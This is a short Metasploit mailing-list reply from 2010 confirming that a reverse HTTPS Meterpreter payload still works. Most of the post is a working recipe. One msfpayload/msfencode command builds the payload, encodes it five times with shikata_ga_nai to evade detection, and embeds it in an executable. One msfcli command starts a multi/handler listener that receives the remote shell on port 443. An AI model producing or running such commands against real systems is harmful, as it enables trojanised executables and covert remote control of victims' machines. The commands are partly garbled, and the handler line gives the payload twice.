Metasploit mailing list archives

Re: windows/meterpreter/reverse_https still working

From: Marc Doudiet <marc.doudiet () gmail com>
Date: Tue, 16 Nov 2010 21:54:20 +0100

Hi,

I just used it today and it worked like a charm:

./msfpayload windows/meterpreter/reverse_https LHOST=xx.xx.xx.xx LPORT=443 R | ./msfencode -t exe -x test.exe -o
test.exe -e x86/shikata_ga_nai -c 5

./msfcli exploit/multi/handler payload=shikata_ga_nai lhost=xx.xx.xx.xx lport=443
payload=windows/meterpreter/reverse_https E

hope this help.